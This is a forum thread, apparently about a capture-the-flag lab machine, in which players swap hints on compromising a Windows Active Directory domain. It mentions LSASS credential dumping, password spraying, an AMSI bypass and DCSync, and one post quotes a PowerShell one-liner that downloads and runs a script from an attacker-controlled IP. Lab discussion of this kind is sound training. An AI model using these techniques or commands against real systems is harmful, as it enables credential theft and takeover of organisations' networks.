,
1 Like
Thank but I’ve already have reverse shell, I’m trying to run mimikatz
Ok, thank you very much for giving me this hint, I have downloaded the file using ftp, it took me several days, haha
Did you solve this? I have two passwords from the LSASS dump, using impacket - but neither of them work with lorra?
For lorra199, is the password PWN*13 the correct one, from the DMP file?
Try password spraying with CrackMapExec
yes
Everyone, I have got the password of lorra199 and logged in with evil-winrm, but I don’t have much experience in windows rights, what should I do next?
My AD knowledge is letting me down here, what other tools can you run to look for vulns? Stuck on this part now…
In AD, since the attack surface is too big, you should look for permission misconfiguration.
Check users privileges and search what can you do with it.
A simple “whoami /priv” will do.
If even after researching the current user’s privilege abuse path, you find yourself struggling DM me for a more direct hint.
2 Likes
Bloodhound helps a LOT for this but you’ll need to bypass AMSI to get Sharphound to work.
1 Like
So, I think I got the AMSI bypass working, using the hardware breakpoint as described here Bypassing AMSI using Hardware Break Points — In 2024 | by Zeyad Mohammed | May, 2024 | Medium.
However, when I upload an run SharpHound.ps1 like this iex(New-Object Net.WebClient).DownloadString('http://10.10.14.203:9001/SharpHound.ps1') I just get absolutely no output? I can’t even get the Help contents to appear…
*Evil-WinRM* PS C:\Users\lorra199\Documents> Invoke-BloodHound -Version
*Evil-WinRM* PS C:\Users\lorra199\Documents> Invoke-BloodHound -Help
*Evil-WinRM* PS C:\Users\lorra199\Documents>
If you downgrade your bloodhound environment you can get bloodhound-python to work much easier for this box. Its not as good as sharp hound but man getting sharphound to work was a pain for me. i just eventfully resorted to older bloodhound.
Could try the SharpHound binary instead of the PS1 script. Not sure if it will run on this box didnt try the binary.
1 Like
Interesting, I did try $ bloodhound-python -d freelancer.htb -u freelancer\lorra199 -p PWN3D#l0rr@Arm****** -ns 10.10.11.5 but then get an LDAP auth error CollectionException('Could not authenticate to LDAP. Check your credentials and LDAP server requirements.')
I’m assuming I’ve got some of the parameters wrong here?
I had that issue also.
Two things that helped me resolve it. Or i just got lucky
1: This box has a Clock skew on the DC. You need to sync your attack box to the DC’s time so its not off greatly. This will come in handy with root also 
2: This box was very buggy. Sometimes you just gotta reset it like two or three times for it to finally work. I cant count how many times i reset this one.
1 Like
Ah ha! It works finally, and I have a possible path in BloodHound, using DCSync 
1 Like
2 Likes
Sometimes BloodHound will give you DCSync but you’ll might need local admin level permissions at least to execute it with Mimikatz.
Try researching about the permissions your user has.
Everybody is always eager to jump to Bloodhound without even checking a simple ‘whoami /priv’.
1 Like
Ha, yes literally just messaged @FroggieDrinks about that stumbling block with a DCSync. Will research the current permissions more…
1 Like
Finally!! That was a heck of a challenge, thanks for all the help folks!
1 Like